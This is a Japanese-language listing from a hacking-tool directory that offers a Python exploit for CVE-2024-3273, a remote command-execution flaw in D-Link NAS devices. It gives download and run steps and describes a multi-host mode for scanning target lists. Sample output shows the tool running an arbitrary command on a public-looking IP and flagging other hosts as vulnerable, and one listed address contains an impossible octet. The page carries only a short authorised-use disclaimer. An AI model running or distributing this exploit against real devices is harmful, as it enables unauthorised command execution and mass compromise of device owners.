Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3273 — CVE-2024-3273 のエクスプロイト。単一ホストおよび複数ホストに対応。 | Kitploit
ツール/GitHubGitHub/adhikara13/cve-2024-3273
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

CVE-2024-3273 のエクスプロイト。単一ホストおよび複数ホストに対応。

リポジトリを見る
1312年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-3273 概念実証 (PoC)

このリポジトリには、D-Link NAS デバイスで発見されたセキュリティ脆弱性 CVE-2024-3273 の概念実証 (PoC) が含まれています。この脆弱性により、攻撃者は脆弱なデバイス上で任意のコマンドを実行できます。

説明

CVE-2024-3273 は、D-Link NAS デバイスにおける脆弱性であり、リモートの攻撃者が cgi-bin/nas_sharing.cgi エンドポイントへの巧妙に細工された HTTP リクエストを介して任意のコマンドを実行することを可能にします。

この PoC は、脆弱な D-Link NAS デバイス上でコマンドを実行するためにこの脆弱性をどのように悪用できるかを示しています。

必要条件

  • Python 3.x
  • requests ライブラリ

使用方法

  1. このリポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. リポジトリディレクトリに移動します:

    root@kitploit:~
    cd CVE-2024-3273
    
  3. PoC を実行します:

    root@kitploit:~
    python main.py
    
  4. 画面上の指示に従ってターゲットデバイスを選択します:

    • オプション 1: シングルホスト (1): 単一のターゲットデバイスの詳細(ホスト IP アドレスと実行するコマンド)を入力します。
    • オプション 2: マルチホスト (2): host:port 形式で複数のターゲットデバイスを含むファイルを指定し、脆弱なホストを vulnerables.txt にエクスポートするかどうかを選択します。

例

root@kitploit:~
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi

┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛

Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.

免責事項

この PoC は教育および研究目的のみに提供されています。責任を持って使用し、テストが許可されているデバイスでのみ使用してください。

コントリビューション

コントリビューションを歓迎します!問題点や改善点を見つけた場合は、遠慮なく Issue を開くかプルリクエストを作成してください。

ツールをダウンロード